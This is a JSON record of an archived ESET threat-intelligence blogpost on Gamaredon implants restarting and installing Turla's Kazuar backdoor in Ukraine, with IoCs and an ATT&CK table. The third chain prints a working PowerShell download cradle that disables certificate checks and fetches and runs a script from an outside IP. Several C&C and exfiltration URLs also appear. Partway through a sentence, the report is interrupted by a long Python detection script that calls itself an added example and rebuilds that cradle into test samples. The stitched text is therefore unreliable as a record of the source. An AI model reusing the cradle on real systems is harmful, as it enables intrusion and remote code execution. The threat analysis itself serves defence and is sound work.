{
	"id": "ae3dfe8d-20e8-4815-ac09-7ff64f22573b",
	"created_at": "2026-04-06T00:16:12.097592Z",
	"updated_at": "2026-04-10T03:37:36.940446Z",
	"deleted_at": null,
	"sha1_hash": "bdcc83093677dc0ad36b2937396bc3d8b51dca57",
	"title": "Gamaredon X Turla collab",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2010395,
	"plain_text": "Gamaredon X Turla collab\r\nBy Matthieu Faou and Zoltán Rusnák\r\nArchived: 2026-04-05 23:21:28 UTC\r\nIn this blogpost, we uncover the first known cases of collaboration between Gamaredon and Turla, in Ukraine.\r\nKey points of this blogpost:\r\nIn February 2025, we discovered that the Gamaredon tool PteroGraphin was used to restart\r\nTurla’s Kazuar backdoor on a machine in Ukraine.\r\nIn April and June 2025, we detected that Kazuar v2 was deployed using Gamaredon tools\r\nPteroOdd and PteroPaste.\r\nThese discoveries lead us to believe with high confidence that Gamaredon is collaborating with\r\nTurla.\r\nTurla’s victim count is very low compared to the number of Gamaredon compromises,\r\nsuggesting that Turla chooses the most valuable machines.\r\nBoth groups are affiliated with the FSB, Russia’s main domestic intelligence and security\r\nagency.\r\nThreat actor profiles\r\nGamaredon\r\nGamaredon has been active since at least 2013. It is responsible for many attacks, mostly against Ukrainian\r\ngovernmental institutions, as evidenced over time in several reports from CERT-UA and from other official\r\nUkrainian bodies. Gamaredon has been attributed by the Security Service of Ukraine (SSU) to the Center 18 of\r\nInformation Security of the FSB, operating out of occupied Crimea. We believe this group to be collaborating with\r\nanother threat actor that we discovered and named InvisiMole.\r\nTurla\r\nTurla, also known as Snake, is an infamous cyberespionage group that has been active since at least 2004, possibly\r\nextending back into the late 1990s. It is thought to be part of the FSB. It mainly focuses on high-profile targets,\r\nsuch as governments and diplomatic entities, in Europe, Central Asia, and the Middle East. It is known for having\r\nbreached major organizations such as the US Department of Defense in 2008 and the Swiss defense company\r\nRUAG in 2014. 
During the past few years, we have documented a large part of Turla’s arsenal on the\r\nWeLiveSecurity blog and in private reports.\r\nOverview\r\nhttps://www.welivesecurity.com/en/eset-research/gamaredon-x-turla-collab/\r\nPage 1 of 14\n\nIn February 2025, via ESET telemetry, we detected four different Gamaredon-Turla co-compromises in Ukraine.\r\nOn those machines, Gamaredon deployed a wide range of tools, including PteroLNK, PteroStew, PteroOdd,\r\nPteroEffigy, and PteroGraphin, while Turla only deployed Kazuar v3.\r\nOn one of those machines, we were able to capture a payload showing that Turla is able to issue commands via\r\nGamaredon implants. PteroGraphin was used to restart Kazuar, possibly after Kazuar crashed or was not launched\r\nautomatically. Thus, PteroGraphin was probably used as a recovery method by Turla. This is the first time that we\r\nhave been able to link these two groups together via technical indicators (see First chain: Restart of Kazuar v3).\r\nBecause, in all four cases, the ESET endpoint product was installed after the compromises, we are unable to\r\npinpoint the exact compromise method. However, Gamaredon is known for using spearphishing and malicious\r\nLNK files on removable drives (as explained in our recent blogpost), so we presume that one of these is the most\r\nlikely compromise vector.\r\nIn April and June 2025, we detected Kazuar v2 installers being deployed directly by Gamaredon tools (see Second\r\nchain: Deployment of Kazuar v2 via PteroOdd and Third chain: Deployment of Kazuar v2 via PteroPaste). This\r\nshows that Turla is actively collaborating with Gamaredon to gain access to specific machines in Ukraine.\r\nVictimology\r\nOver the past 18 months we have detected Turla on seven machines in Ukraine. We believe that Gamaredon\r\ncompromised the first four machines in January 2025, while Turla deployed Kazuar v3 in February 2025. 
In all\r\ncases, the ESET endpoint product was only installed after both compromises.\r\nIt is worth noting that, prior to this, the last time we detected a Turla compromise in Ukraine was in February\r\n2024.\r\nAll those elements, and the fact that Gamaredon is compromising hundreds if not thousands of machines, suggest\r\nthat Turla is interested only in specific machines, probably ones containing highly sensitive intelligence.\r\nAttribution\r\nGamaredon\r\nIn those compromises, we detected PteroLNK, PteroStew, and PteroGraphin, which we believe are exclusive to\r\nGamaredon.\r\nTurla\r\nSimilarly, for Turla, we detected the use of Kazuar v2 and Kazuar v3, which we believe are exclusive to that\r\ngroup.\r\nGamaredon-Turla collaboration hypotheses\r\nIn 2020, we showed that Gamaredon provided access to InvisiMole (see our white paper), so it is not the first time\r\nthat Gamaredon has collaborated with another Russia-aligned threat actor.\r\nOn the other hand, Turla is known for hijacking other threat actors’ infrastructure to get an initial foothold in its\r\ntargets’ networks. Over the past years, several cases have been publicly documented:\r\nIn 2019, Symantec published a blogpost showing that Turla hijacked OilRig (an Iran-aligned group)\r\ninfrastructure to spy on a Middle Eastern target.\r\nIn 2023, Mandiant published a blogpost showing that Turla reregistered expired Andromeda C\u0026C domains\r\nin order to compromise targets in Ukraine.\r\nIn 2024, Microsoft published two blogposts (first and second) showing that Turla hijacked the cybercrime\r\nbotnet Amadey and infrastructure of the cyberespionage group SideCopy (a Pakistan-aligned group) in\r\norder to deploy Kazuar.\r\nNote that both Gamaredon and Turla are part of the Russian Federal Security Service (FSB). 
Gamaredon is\r\nthought to be operated by officers of Center 18 of the FSB (aka the Center for Information Security) in Crimea\r\n(see this report from the Security Service of Ukraine), which is part of the FSB’s counterintelligence service. As\r\nfor Turla, the UK’s NCSC attributes the group to the Center 16 of the FSB, which is Russia’s main signals\r\nintelligence (SIGINT) agency.\r\nTherefore, we propose three hypotheses to explain our observations:\r\nVery likely: Given that both groups are part of the Russian FSB (though in two different Centers),\r\nGamaredon provided access to Turla operators so that they could issue commands on a specific machine to\r\nrestart Kazuar, and deploy Kazuar v2 on some others.\r\nUnlikely: Turla compromised Gamaredon infrastructure and leveraged this access to recover access on a\r\nmachine in Ukraine. Since PteroGraphin contains a hardcoded token that allows modifying the C\u0026C pages,\r\nthis possibility cannot be fully discarded. However, it implies that Turla was able to reproduce the full\r\nGamaredon chain.\r\nUnlikely: Gamaredon has access to Kazuar and deploys it on very specific machines. Given Gamaredon’s\r\nnoisy approach, we don’t think it would be that careful deploying Kazuar on only a very limited set of\r\nvictims.\r\nGeopolitical context\r\nFrom an organizational perspective, it is worth noting that the two entities commonly associated with Turla and\r\nGamaredon have a long history of reported collaboration, which can be traced back to the Cold War era.\r\nThe FSB’s Center 16 (which is believed to harbor Turla) is a direct heir to the KGB’s 16th Directorate, which was\r\nmainly responsible for foreign SIGINT collection – the persistence of the number 16 is in fact regarded by\r\nobservers as a sign of the FSB leadership’s desire to emphasize a historical lineage. 
Center 18 (which is generally\r\nassociated with Gamaredon) maintains a rough affiliation with the KGB’s 2nd Chief Directorate, which was\r\nresponsible for internal security within the Soviet Union. During the Soviet era, both organizations frequently\r\nworked hand in hand, sharing responsibilities for monitoring foreign embassies on Russian soil for instance.\r\nThen and now, such collaborations reflect the Russian strategic culture and philosophy of a natural continuity\r\nbetween internal security and national defense. Although Center 16 is still tasked with foreign intelligence\r\ncollection and Center 18 is theoretically part of the FSB’s counterintelligence apparatus, both entities seem to\r\nmaintain some mission overlaps – especially with regard to former Soviet republics. In 2018, the Security Service\r\nof Ukraine (SBU) had already observed Centers 16 and 18 apparently conducting a joint cyberespionage\r\ncampaign (named SpiceyHoney). The 2022 full-scale invasion of Ukraine has probably reinforced this\r\nconvergence, with ESET data clearly showing Gamaredon and Turla activities focusing on the Ukrainian defense\r\nsector in recent months.\r\nAlthough the Russian intelligence community is known for its fierce internal rivalries, there are indications that\r\nsuch tensions chiefly apply to interservice relations rather than to intra-agency interactions. In this context, it is\r\nperhaps not entirely surprising that APT groups operating within these two FSB Centers are observed cooperating\r\nto some extent.\r\nFirst chain: Restart of Kazuar v3\r\nIn February 2025, we detected the execution of Kazuar by PteroGraphin and PteroOdd on a machine in Ukraine.\r\nIn this section we detail the exact chain that we detected.\r\nTimeline\r\nThe overall timeline for this machine is the following:\r\n2025-01-20: Gamaredon deployed PteroGraphin on the machine. 
Note that the date is from the file creation\r\ntimestamp provided by Windows, which could have been tampered with.\r\n2025-02-11: Turla deployed Kazuar v3 on the machine. Note that the date is from the file creation\r\ntimestamp provided by Windows, which could have been tampered with.\r\n2025-02-27 15:47:39 UTC: PteroGraphin downloaded PteroOdd.\r\n2025-02-27 15:47:56 UTC: PteroOdd downloaded a payload, which executed Kazuar.\r\n2025-02-28 15:17:14 UTC: PteroOdd downloaded another payload, which also executed Kazuar.\r\nHereafter, we assume these dates to be unaltered.\r\nDetails of the events\r\nFrom January 20th, 2025, PteroGraphin (see Figure 1) was present on the machine at %APPDATA%\\x86.ps1. It is\r\na downloader that provides an encrypted channel for delivering payloads via Telegra.ph, a web service operated\r\nby Telegram that enables easy creation of web pages. Note that PteroGraphin contains a token to edit the\r\nTelegra.ph page, so anyone with knowledge of this token (Turla, for example, though unlikely) could manipulate\r\nthe contents.\r\nFigure 1. PteroGraphin (token partially redacted)\r\nOn February 27th, 2025, at 15:47:39 UTC, as shown in Figure 2, we detected a reply from\r\nhttps://api.telegra[.]ph/getPage/SecurityHealthSystray-01-20?return_content=true.\r\nFigure 2. Beautified JSON reply\r\nThe data in children can be decrypted using the hardcoded 3DES key and IV from the PteroGraphin script above,\r\nwhich gives:\r\npowershell -windowStyle hidden -EncodedCommand \u003cbase64-encoded_payload\u003e\r\nThe decoded payload is another PowerShell downloader that we named PteroOdd, shown in Figure 3.\r\nFigure 3. 
PteroOdd\r\nOn February 27th, 2025 at 15:47:56 UTC, we detected a request to https://api.telegra[.]ph/getPage/dinoasjdnl-02-27?return_content=true; the reply is shown in Figure 4. Note that the replies for PteroOdd are not encrypted.\r\nFigure 4. PteroOdd JSON reply (beautified and partially redacted)\r\nThe decoded command is shown in Figure 5.\r\nFigure 5. Decoded PowerShell command (username redacted)\r\nThe payload first uploads the victim’s computer name and system drive’s volume serial number to the Cloudflare\r\nworker subdomain https://lucky-king-96d6.mopig92456.workers[.]dev.\r\nWhat is most interesting is the last line:\r\nStart-Process -FilePath \"C:\\Users\\[redacted]\\AppData\\Local\\Programs\\Sony\\Audio\\Drivers\\vncutil64.exe\"\r\nThis is the path of the legitimate application that is launched so that it side-loads Kazuar. The ESET endpoint product\r\ndetected a KERNEL Kazuar v3 payload (agent_label is AGN-RR-01) in memory, loaded from this process. It\r\nis not clear to us why Turla operators had to use PteroGraphin to launch Kazuar, but it is possible that Kazuar\r\nsomehow stopped working after the ESET product installation and that they had to restart the implant. Note that\r\nwe didn’t see Gamaredon downloading Kazuar; it was present on the system since February 11th, 2025, before the\r\nESET product was installed.\r\nThen, on February 28th, 2025 at 15:17:14 UTC, we detected another similar PowerShell script, shown in Figure 6.\r\nFigure 6. Second PowerShell command executing Kazuar\r\nThe first lines and the Cloudflare worker subdomain are identical. It starts the same vncutil64.exe but also a\r\nsecond executable, LaunchGFExperience.exe, which side-loads LaunchGFExperienceLOC.dll – the Kazuar\r\nloader. We then detected in memory, in the LaunchGFExperience.exe process, another KERNEL Kazuar v3\r\npayload (agent_label is AGN-XX-01). 
It is not clear why two different KERNEL Kazuar v3 payloads were present\r\non the same machine.\r\nFinally, an HTTP POST request, with the list of running processes, was sent to https://eset.ydns[.]eu/post.php. The\r\nTurla operators most likely wanted confirmation that Kazuar was successfully launched.\r\nOn March 10th, 2025 at 07:05:32 UTC, we detected another sample of PteroOdd, which uses the C\u0026C URL\r\nhttps://api.telegra[.]ph/getPage/canposgam-03-06?return_content=true. This sample was detected on a different\r\nmachine in Ukraine, on which Kazuar was also present.\r\nThe decoded payload is shown in Figure 7 and shows that it also uses eset.ydns[.]eu, while not interacting with\r\nany Turla sample.\r\nOn the other hand, we noted that the downloaded payload uploads the following pieces of information to\r\nhttps://eset.ydns[.]eu/post.php:\r\nthe victim’s computer name and username,\r\nlast boot time,\r\nthe list of running processes,\r\nOS version,\r\nOS bitness,\r\nthe list of installed .NET versions (extracted from HKLM\\SOFTWARE\\Microsoft\\NET Framework Setup\\NDP),\r\nthe list of files and directories in %TEMP% and all its subdirectories, and\r\nthe list of files and directories in the following paths:\r\n○ %APPDATA%\\Microsoft\\Windows\r\n○ C:\\Program Files\r\n○ C:\\Program Files (x86)\r\nHowever, we are not aware of any .NET tool that is currently being used by Gamaredon, while there are several of\r\nthem used by Turla, including Kazuar. Thus, it is possible that these uploaded pieces of information are for Turla,\r\nand we assess with medium confidence that the domain eset.ydns[.]eu is controlled by Turla.\r\nFigure 7. 
PteroOdd sample\r\nThe additional base64-encoded PowerShell command is a new downloader that abuses api.gofile[.]io; we named it\r\nPteroEffigy.\r\nKazuar v3\r\nKazuar v3 is the latest branch of the Kazuar family, itself an advanced C# espionage implant that we believe has been\r\nused exclusively by Turla since it was first seen in 2016. Kazuar v2 and v3 are fundamentally the same malware\r\nfamily and share the same codebase. However, some major changes have been introduced.\r\nKazuar v3 comprises around 35% more C# lines than Kazuar v2 and introduces additional network transport\r\nmethods: over web sockets and Exchange Web Services. Kazuar v3 can have one of three roles (KERNEL,\r\nBRIDGE, or WORKER), and malware functionalities are divided among those roles. For example, only BRIDGE\r\ncommunicates with the C\u0026C server.\r\nSecond chain: Deployment of Kazuar v2 via PteroOdd\r\nOn one of the Ukrainian machines mentioned in the previous section, we detected another interesting compromise\r\nchain on April 18th, 2025.\r\nOn April 18th, 2025 at 15:26:14 UTC, we detected a PteroOdd sample (a Gamaredon tool) downloading a payload\r\nfrom https://api.telegra[.]ph/getPage/scrsskjqwlbw-02-28?return_content=true. The downloaded script, shown in\r\nFigure 8, is similar to the payload described in the first chain, but contains an additional base64-encoded script,\r\nwhich is the PowerShell downloader PteroEffigy.\r\nFigure 8. 
Payload downloaded by PteroOdd\r\nThis PowerShell payload downloads another payload from https://eset.ydns[.]eu/scrss.ps1 and executes it.\r\nscrss.ps1 turned out to be an installer for Turla’s Kazuar v2, which was previously analyzed in detail by Unit42.\r\nThis shows that Gamaredon deployed Kazuar, most likely on behalf of Turla.\r\nThe Kazuar agent_label is AGN-AB-26 and the three C\u0026C servers are:\r\nhttps://abrargeospatial[.]ir/wp-includes/fonts/wp-icons/index.php\r\nhttps://www.brannenburger-nagelfluh[.]de/wp-includes/style-engine/css/index.php\r\nhttps://www.pizzeria-mercy[.]de/wp-includes/images/media/bar/index.php\r\nIt is worth noting that Turla keeps using compromised WordPress servers as C\u0026Cs for Kazuar.\r\nInterestingly, it seems that Kazuar v2 is still maintained in parallel to Kazuar v3. For example, the recent updates\r\nto the backdoor commands in Kazuar v3 are also included in this AGN-AB-26 version.\r\nThird chain: Deployment of Kazuar v2 via PteroPaste\r\nOn June 5th and 6th, 2025, we detected Gamaredon deploying a Turla implant on two machines in Ukraine. In\r\nboth cases, Gamaredon’s PteroPaste was caught trying to execute the simple PowerShell script shown in Figure 9.\r\nFigure 9. PowerShell script executed by PteroPaste\r\nThe base64-encoded string is the following downloader in PowerShell:\r\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};iex(New-Object Net.WebClient).downloadString('https://91.231.182[.]187/ekrn.ps1');\r\nThe first statement disables TLS certificate validation for the PowerShell process, so the download succeeds even if 91.231.182[.]187 presents an untrusted certificate; the second fetches the script and runs it in memory without writing it to disk.\r\nThe downloaded script ekrn.ps1 is very similar to scrss.ps1 mentioned in the second chain. 
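The three chains above share one pattern: a short PowerShell stage that base64-decodes and runs the next stage, ending in a downloader that fetches the Kazuar installer over HTTPS. The following Python script is an added example, not code from the ESET post or from either group. It peels those layers apart (powershell -EncodedCommand carries base64 of UTF-16LE text; nested [Convert]::FromBase64String blobs are decoded with a byte heuristic) and matches the behaviours the post describes: ServerCertificateValidationCallback = {$true}, the iex/downloadString cradle, telegra.ph getPage URLs, workers.dev hosts, HTTPS to a bare IP address, and Start-Process of an executable under %LOCALAPPDATA%\Programs. The one-line cradle is quoted from the third chain; the wrapper built around it and the stand-in for the first chain's Figure 5 payload are constructed for the example, and the malicious/suspicious thresholds are the example's own choice.

```python
"""Decode and triage the PowerShell download cradles used in the chains above.

Added example, not ESET's or either group's code. Unwraps the layers the post
describes (powershell -EncodedCommand = base64 of UTF-16LE text, nested
[Convert]::FromBase64String blobs) and flags the behaviours seen in the three
chains. Sample scripts are constructed; only CRADLE is quoted from the post.
"""
from __future__ import annotations

import base64
import binascii
import re

DOT = r"(?:\.|\[\.\])"  # accept both live and defanged ("[.]") dots

# One regex per behaviour described in the post.
INDICATORS = {
    "hidden_window": re.compile(r"-windowStyle\s+hidden", re.I),
    "cert_validation_disabled": re.compile(
        r"ServerCertificateValidationCallback\s*=\s*\{\s*\$true\s*\}", re.I),
    "download_cradle": re.compile(
        r"\b(?:iex|Invoke-Expression)\b.*?downloadString\(", re.I | re.S),
    "telegraph_c2": re.compile(rf"api{DOT}telegra{DOT}ph/getPage/", re.I),
    "cloudflare_worker": re.compile(rf"{DOT}workers{DOT}dev\b", re.I),
    "ip_literal_https": re.compile(
        rf"https?://\d{{1,3}}(?:{DOT}\d{{1,3}}){{3}}(?::\d+)?/", re.I),
    "sideload_host_launch": re.compile(
        r"Start-Process\s+-FilePath\s+\S*\\AppData\\Local\\Programs\\\S*\.exe", re.I),
}
# -EncodedCommand and its accepted abbreviations, followed by a base64 blob.
ENCODED_COMMAND_RE = re.compile(r"-e(?:ncodedcommand|nco|nc|c)?\s+([A-Za-z0-9+/=]{16,})", re.I)
FROM_BASE64_RE = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=\s]+)['\"]\s*\)", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)


def _b64(blob: str) -> bytes:
    """Base64-decode tolerantly: strip whitespace, restore missing padding."""
    blob = re.sub(r"\s+", "", blob)
    try:
        return base64.b64decode(blob + "=" * (-len(blob) % 4))
    except (binascii.Error, ValueError):
        return b""


def _bytes_to_text(raw: bytes) -> str:
    """UTF-16LE ASCII text has a NUL in every second byte; otherwise assume UTF-8."""
    if len(raw) >= 2 and raw[1::2].count(0) > len(raw) // 4:
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("utf-8", errors="replace")


def decode_encoded_command(blob: str) -> str:
    """powershell -EncodedCommand always takes base64 of UTF-16LE text."""
    return _b64(blob).decode("utf-16-le", errors="replace")


def unwrap_layers(script: str, max_depth: int = 8) -> list[str]:
    """Return the script followed by every stage decoded out of it, outermost first."""
    layers, frontier = [script], [script]
    for _ in range(max_depth):  # depth cap guards against self-referential blobs
        found = []
        for text in frontier:
            found += [decode_encoded_command(m.group(1)) for m in ENCODED_COMMAND_RE.finditer(text)]
            found += [_bytes_to_text(_b64(m.group(1))) for m in FROM_BASE64_RE.finditer(text)]
        found = [f for f in found if f and f not in layers]
        if not found:
            break
        layers.extend(found)
        frontier = found
    return layers


def defang(url: str) -> str:
    """Make a URL safe to paste into a report: every host dot becomes [.]."""
    scheme, _, rest = url.partition("://")
    host, slash, path = rest.partition("/")
    host = host.replace("[.]", ".").replace(".", "[.]")
    return f"{scheme}://{host}{slash}{path}"


def triage(script: str) -> dict:
    """Unwrap all stages, collect indicator hits and URLs, and give a verdict.

    Thresholds are this example's choice: two or more of the post's behaviours
    in one sample is called malicious, one is suspicious, none is clean.
    """
    layers = unwrap_layers(script)
    hits = {name for layer in layers for name, rx in INDICATORS.items() if rx.search(layer)}
    urls = {defang(u) for layer in layers for u in URL_RE.findall(layer)}
    verdict = "malicious" if len(hits) >= 2 else "suspicious" if hits else "clean"
    return {"layers": len(layers), "indicators": sorted(hits), "urls": sorted(urls), "verdict": verdict}


# Quoted from the post: the downloader PteroPaste executed in the third chain.
CRADLE = ("[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
          "iex(New-Object Net.WebClient).downloadString('https://91.231.182[.]187/ekrn.ps1');")


def build_pteropaste_sample() -> str:
    """Constructed wrapper: the cradle base64-encoded inside a short script,
    itself passed as -EncodedCommand, so the decoder sees three layers."""
    inner = base64.b64encode(CRADLE.encode("utf-8")).decode()
    stage1 = f"iex([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{inner}')))"
    return "powershell -windowStyle hidden -EncodedCommand " + base64.b64encode(stage1.encode("utf-16-le")).decode()


def build_restart_sample() -> str:
    """Constructed stand-in for the first chain's payload (Figure 5 is not reproduced
    in the post): report to the Cloudflare worker, then start the side-loading host."""
    return "\n".join([
        "$id = $env:COMPUTERNAME",
        "Invoke-WebRequest -Uri 'https://lucky-king-96d6.mopig92456.workers[.]dev/' -Method POST -Body $id | Out-Null",
        'Start-Process -FilePath "C:\\Users\\victim\\AppData\\Local\\Programs\\Sony\\Audio\\Drivers\\vncutil64.exe"',
    ])


if __name__ == "__main__":
    for sample in (build_pteropaste_sample(), build_restart_sample()):
        print(triage(sample))
```

Run it as a script to print the triage of both constructed samples, or import it and call triage() on a decoded script block from your own EDR telemetry. It is static and only handles base64 layering: string concatenation, char-code arrays or compression need a further unwrapper, and a sample that comes out as clean here is not cleared, only unmatched.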
ekrn.ps1 also drops and installs Kazuar v2.\r\nBoth samples have an agent_label of AGN-AB-27 and the C\u0026C servers are the same as those in the sample from\r\nthe second chain:\r\nhttps://www.brannenburger-nagelfluh[.]de/wp-includes/style-engine/css/index.php\r\nhttps://www.pizzeria-mercy[.]de/wp-includes/images/media/bar/index.php\r\nhttps://abrargeospatial[.]ir/wp-includes/fonts/wp-icons/index.php\r\nekrn.exe is a legitimate process of ESET endpoint security products. Thus, Turla probably tried to masquerade as\r\nit in order to fly under the radar. Also note that ekrn.ydns[.]eu resolves to 91.231.182[.]187.\r\nFinally, we also found on VirusTotal a VBScript variant of the Kazuar v2 PowerShell installer. It was uploaded\r\nfrom Kyrgyzstan on June 5th, 2025. This suggests that Turla is interested in targets outside of Ukraine as well.\r\nConclusion\r\nIn this blogpost, we have shown how Turla was able to leverage implants operated by Gamaredon (PteroGraphin,\r\nPteroOdd, and PteroPaste) in order to restart Kazuar v3 and deploy Kazuar v2 on several machines in Ukraine. We\r\nnow believe with high confidence that both groups – separately associated with the FSB – are cooperating and that\r\nGamaredon is providing initial access to Turla.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at\r\nthreatintel@eset.com. \r\nESET Research offers private APT intelligence reports and data feeds. 
For any inquiries about this\r\nservice, visit the ESET Threat Intelligence page.\r\nIoCs\r\nA comprehensive list of indicators of compromise (IoCs) and samples can be found in our GitHub repository.\r\nFiles\r\nSHA-1 | Filename | Detection | Description\r\n7DB790F75829D3E6207D8EC1CBCD3C133F596D67 | N/A | PowerShell/Pterodo.QB | PteroOdd.\r\n2610A899FE73B8F018D19B50BE55D66A6C78B2AF | N/A | PowerShell/Pterodo.QB | PteroOdd.\r\n3A24520566BBE2E262A2911E38FD8130469BA830 | N/A | PowerShell/Pterodo.QB | PteroOdd.\r\nDA7D5B9AB578EF6487473180B975A4B2701FDA9E | scrss.ps1 | PowerShell/Turla.AI | Kazuar v2 installer.\r\nD7DF1325F66E029F4B77E211A238AA060D7217ED | N/A | MSIL/Turla.N.gen | Kazuar v2.\r\nFF741330CC8D9624D791DE9074086BBFB0E257DC | N/A | PowerShell/TrojanDownloader.Agent.DV | PowerShell downloader executed by PteroPaste.\r\nA7ACEE41D66B537D900403F0E6A26AB6A1290A32 | ekrn.ps1 | PowerShell/Turla.AJ | Kazuar v2 installer.\r\n54F2245E0D3ADEC566E4D822274623BF835E170C | N/A | MSIL/Agent_AGen.CZQ | Kazuar v2.\r\n371AB9EB2A3DA44099B2B7716DE0916600450CFD | ekrn.ps1 | PowerShell/Turla.AJ | Kazuar v2 installer.\r\n4A58365EB8F928EC3CD62FF59E59645C2D8C0BA5 | N/A | MSIL/Turla.W | Kazuar v2.\r\n214DC22FA25314F9C0DDA54F669EDE72000C85A4 | Sandboxie.vbs | VBS/Turla.C | Kazuar v2 installer – VBScript variant.\r\nNetwork\r\nIP | Domain | Hosting provider | First seen | Details\r\nN/A | lucky-king-96d6.mopig92456.workers[.]dev | N/A | 2025‑02‑28 | Cloudflare worker found in payloads downloaded by PteroOdd.\r\n64.176.173[.]164 | eset.ydns[.]eu | The Constant Company, LLC | 2025‑03‑01 | C\u0026C server found in payloads downloaded by PteroOdd.\r\n85.13.145[.]231 | hauptschule-schwalbenstrasse[.]de | Neue Medien Muennich GmbH | 2024‑06‑06 | Compromised WordPress site used as Kazuar C\u0026C.\r\n91.231.182[.]187 | ekrn.ydns[.]eu | South Park Networks LLC | 2025‑06‑05 | C\u0026C server in payloads downloaded by PteroPaste.\r\n185.118.115[.]15 | fjsconsultoria[.]com | Dream Fusion - IT Services, Lda | 2024‑06‑26 | Compromised WordPress site used as Kazuar C\u0026C.\r\n77.46.148[.]242 | ingas[.]rs | TELEKOM SRBIJA a.d. | 2024‑06‑03 | Compromised WordPress site used as Kazuar C\u0026C.\r\n168.119.152[.]19 | abrargeospatial[.]ir | Hetzner Online GmbH | 2023‑11‑13 | Compromised WordPress site used as Kazuar C\u0026C.\r\n217.160.0[.]33 | www.brannenburger-nagelfluh[.]de | IONOS SE | 2019‑06‑06 | Compromised WordPress site used as Kazuar C\u0026C.\r\n217.160.0[.]159 | www.pizzeria-mercy[.]de | IONOS SE | 2023‑10‑05 | Compromised WordPress site used as Kazuar C\u0026C.\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 17 of the MITRE ATT\u0026CK framework.\r\nTactic | ID | Name | Description\r\nResource Development | T1583.001 | Acquire Infrastructure: Domains | Gamaredon or Turla registered a domain at a free dynamic DNS provider.\r\nResource Development | T1583.004 | Acquire Infrastructure: Server | Gamaredon or Turla rented a server at Vultr.\r\nResource Development | T1583.007 | Acquire Infrastructure: Serverless | Gamaredon created Cloudflare workers and Telegra.ph pages.\r\nResource Development | T1584.003 | Compromise Infrastructure: Virtual Private Server | Turla compromised WordPress websites.\r\nResource Development | T1608 | Stage Capabilities | Turla staged Kazuar installer scripts on its C\u0026C servers.\r\nExecution | T1059.001 | Command and Scripting Interpreter: PowerShell | PteroGraphin is developed in PowerShell.\r\nPersistence | T1574.002 | Hijack Execution Flow: DLL Side-Loading | Kazuar loaders use DLL side-loading.\r\nDefense Evasion | T1140 | Deobfuscate/Decode Files or Information | The Kazuar payload is XOR encrypted and all Kazuar strings are encrypted via substitution tables.\r\nDefense Evasion | T1480.001 | Execution Guardrails: Environmental Keying | Kazuar loaders decrypt the payloads, using the machine name as the key.\r\nDefense Evasion | T1036.005 | Masquerading: Match Legitimate Name or Location | Kazuar loaders are located in legitimate-looking directories such as C:\\Program Files (x86)\\Brother Printer\\App\\ or %LOCALAPPDATA%\\Programs\\Sony\\Audio\\Drivers\\.\r\nDiscovery | T1057 | Process Discovery | The PowerShell script starting Kazuar v3 sends the list of running processes to its C\u0026C server.\r\nDiscovery | T1012 | Query Registry | The PowerShell script starting Kazuar v3 gets the PowerShell version from the registry.\r\nDiscovery | T1082 | System Information Discovery | The PowerShell script starting Kazuar v3 exfiltrates the last boot time, OS version, and OS architecture.\r\nDiscovery | T1083 | File and Directory Discovery | The PowerShell script starting Kazuar v3 lists files in the directories %TEMP% and %APPDATA%\\Microsoft\\Windows.\r\nCommand and Control | T1071.001 | Application Layer Protocol: Web Protocols | PteroGraphin and Kazuar use HTTPS.\r\nCommand and Control | T1573.001 | Encrypted Channel: Symmetric Cryptography | PteroGraphin decrypts the C\u0026C reply using 3DES.\r\nCommand and Control | T1102 | Web Service | Legitimate web services, such as Telegra.ph, were used in this campaign.\r\nSource: https://www.welivesecurity.com/en/eset-research/gamaredon-x-turla-collab/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.welivesecurity.com/en/eset-research/gamaredon-x-turla-collab/"
	],
	"report_names": [
		"gamaredon-x-turla-collab"
	],
	"threat_actors": [
		{
			"id": "11f52079-26d3-4e06-8665-6a0b3efdc41c",
			"created_at": "2022-10-25T16:07:23.736987Z",
			"updated_at": "2026-04-10T02:00:04.732021Z",
			"deleted_at": null,
			"main_name": "InvisiMole",
			"aliases": [
				"UAC-0035"
			],
			"source_name": "ETDA:InvisiMole",
			"tools": [
				"InvisiMole"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "8aaa5515-92dd-448d-bb20-3a253f4f8854",
			"created_at": "2024-06-19T02:03:08.147099Z",
			"updated_at": "2026-04-10T02:00:03.685355Z",
			"deleted_at": null,
			"main_name": "IRON HUNTER",
			"aliases": [
				"ATK13 ",
				"Belugasturgeon ",
				"Blue Python ",
				"CTG-8875 ",
				"ITG12 ",
				"KRYPTON ",
				"MAKERSMARK ",
				"Pensive Ursa ",
				"Secret Blizzard ",
				"Turla",
				"UAC-0003 ",
				"UAC-0024 ",
				"UNC4210 ",
				"Venomous Bear ",
				"Waterbug "
			],
			"source_name": "Secureworks:IRON HUNTER",
			"tools": [
				"Carbon-DLL",
				"ComRAT",
				"LightNeuron",
				"Mosquito",
				"PyFlash",
				"Skipper",
				"Snake",
				"Tavdig"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "187a0668-a968-4cf0-8bfd-4bc97c02f6dc",
			"created_at": "2022-10-27T08:27:12.955905Z",
			"updated_at": "2026-04-10T02:00:05.376527Z",
			"deleted_at": null,
			"main_name": "SideCopy",
			"aliases": [
				"SideCopy"
			],
			"source_name": "MITRE:SideCopy",
			"tools": [
				"AuTo Stealer",
				"Action RAT"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
